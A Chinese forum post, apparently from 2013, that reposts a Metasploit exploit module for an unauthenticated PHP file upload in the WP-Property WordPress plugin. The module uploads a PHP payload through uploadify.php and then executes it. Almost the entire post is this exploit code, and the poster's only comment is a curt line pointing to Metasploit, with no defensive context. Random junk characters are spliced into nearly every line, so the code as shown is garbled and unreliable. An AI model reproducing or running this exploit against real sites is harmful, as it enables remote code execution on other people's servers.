WordPress WP-Property PHP 文件上传漏洞( g, W+ M4 b3 g( g4 i9 ?
4 f9 h: W; D8 K% n5 r3 W( b. ? ## # This file is part of the Metasploit Framework and may be subject to
$ v" p: j2 d6 O" b: R) \* i
! w$ D2 l0 G& X3 v# redistribution and commercial restrictions. Please see the Metasploit
/ G0 @8 f' X. S0 d7 a4 [* c/ ^' C4 m# d1 A
# Framework web site for more information on licensing and terms of use.1 v1 ] t7 q9 b: W1 l. d) G9 T/ g N
$ Y3 D0 Q, I1 Y0 ?) S7 G# http://metasploit.com/framework/ ##
% B. g+ e7 q: s l: R1 C! p7 W* b$ c# H5 n7 U7 c; n1 Z9 P/ e
. O1 w3 A# A2 T$ l6 |1 n7 m- u# W0 E3 Y& N7 ^; ^; ]
8 A8 u8 p* X. F8 R6 M q% F
4 G7 u3 f4 k7 S% @) S0 \8 V( ~- D" Grequire 'msf/core'
6 E+ ?4 G( Y+ w6 Vrequire 'msf/core/exploit/php_exe'
+ n' x# V9 R. u/ I' G! g( `1 K2 t8 f$ G% S( c
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
0 S1 I- V- Y- v' v2 `* V: c'Description' => %q{( e* w2 P' ^3 r
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>$ G: P6 o. {/ w% L" x7 P1 a
[
+ a" l: a; z+ S) `- Y" n! Y; c* H/ |'Sammy FORGIT', # initial discovery) V V4 e) n1 a: S5 _+ L- k
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& e, X0 P, C8 I+ ~- B# o],
+ p1 {" w3 B O: u0 |'License' => MSF_LICENSE,
$ e" M! q7 v1 a" o'References' =>, t* y' N2 ~5 d1 E; z
[
- F) n9 e1 r' _' v[ 'OSVDB', '82656' ],
% B: \4 D2 S. q3 I6 H[ 'BID', '53787' ],! g" L7 f! p. m. P1 R; f
[ 'EDB', '18987'],
& E+ x3 A* u1 r G3 f% e) N& [[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
0 u$ P1 F; E" T' `],
5 F6 y- x! Q; {" L'Payload' =>
% S- h5 V7 a3 I2 O8 C& @+ S7 j{
' W. `, L, A% h0 ^+ w6 S'BadChars' => "\x00", _# e. r; R* ^* Y q
},) G( P: A1 D9 c T6 E! P. }
'Platform' => 'php',
2 O6 V. ~ _( c2 o' m3 F'Arch' => ARCH_PHP,7 J& p9 z7 K6 x
'Targets' =>6 [; Q2 j0 j5 g& q. }' F% S
[
- r* H$ H! d( L6 Q$ m+ \5 E+ \[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],( H) |& {) u* c. H6 k) M3 s
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
' p: _; f6 ]7 x, U' n, ]# I],3 L- R1 _, H( x% q! D% E% X) c
'DefaultTarget' => 0,
+ U9 a1 E2 q$ ^3 G% l'DisclosureDate' => 'Mar 26 2012'))8 t" K. e7 s" [: q# L7 n+ J* |: d4 n
: s( d6 i# z% [9 V7 s5 Q( \ _( v
register_options(
# j( \ g4 l' t' x[% O* k8 `, ]- R$ i$ i
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']); w1 }/ o# N, a5 F+ H3 j- m- |
], self.class)5 O8 C8 J3 t% D' [
end o- _& b. A6 z7 ~( z
& y5 j/ G3 v! J( ^; h7 \+ L
def check* @1 U. G: H, S4 q+ I0 w
uri = target_uri.path, o8 I8 w u }% E
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
0 B* I% U. s, q8 e0 m7 v n) e'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php": j) ~' W) M- K" A% s
})
p t# G; L) t+ s" D( T) Q5 q- s$ [. u6 z3 V5 m2 m$ C r3 O
if not res or res.code != 200
8 w6 e' Q! A7 x4 [% p5 z# wreturn Exploit::CheckCode::Unknown7 X6 r8 d4 h0 k% J. M! m4 L
end8 ~( S' z6 V) L( s5 ~
9 M' o& i( y- `7 _' \
return Exploit::CheckCode::Appears
1 W# G$ r0 Q" N9 L7 \+ h' S7 f# d% Eend4 \# _0 m0 w0 @- ~6 ~& I. o
# C) A; u& Y+ P: v4 D' V G
def exploit
0 ^; j+ y) K) D9 j, auri = target_uri.path
$ }% ^8 y1 z+ J+ f( V6 Z+ duri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
' K T" i' S! p2 m9 T N5 a
, h9 J$ }- b2 L/ i* ]data = Rex::MIME::Message.new
- j, \! f: j2 y% \. Sdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
; n$ c' m! V6 R2 z9 y8 tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")' e+ O+ b" Y" T! _- c3 s
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ S6 d2 y) L y o7 L/ }
" q, W7 I9 K M2 z* i, K
print_status("#{peer} - Uploading payload #{@payload_name}"): G, t# Y0 J$ P2 ~
res = send_request_cgi({
2 [* r! W1 v- p+ x+ t+ L'method' => 'POST',
# U5 n% R `5 {% Q% J& h'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
" B6 P! Z0 C( W; F4 S" B4 l'ctype' => "multipart/form-data; boundary=#{data.bound}",
$ c6 O+ |# [: y/ ?' h& V'data' => post_data
) \% g4 o( K; y9 P" Q U})
1 [5 h7 d5 P/ R! J( m- S( b$ _
( U; n8 ~; T U- |# iif not res or res.code != 200 or res.body !~ /#{@payload_name}/
1 o$ r( D2 N* l! w% Dfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
8 C* d/ c# V, I: a9 mend1 @3 g |/ c. l" [+ V/ t& v
- [4 o1 t9 P2 T0 vupload_uri = res.body1 u* j* L; S5 ^
: j) _# P [& H9 p$ S* Aprint_status("#{peer} - Executing payload #{@payload_name}")
% f! X" T, @% O9 S' s+ }res = send_request_raw({
( ?1 n5 s# j% F4 ~6 {'uri' => upload_uri,* l! d; @" i' Q. n
'method' => 'GET') ^6 ?; F- L X6 ]! l; U9 u% d
})
6 H8 @5 T) M! K7 m4 bend! V- v9 Q& C' v! E' W. h
end
9 D, l# y* X. w1 G3 ]$ _9 X
7 l# f4 d2 J( A) V不要问我这写的是什么 怎么利用 我是说msf.: l) y( \% D6 g# k4 c
( w& g: D* K" m
|
发表于 2013-1-4 19:51:30
收藏
支持
反对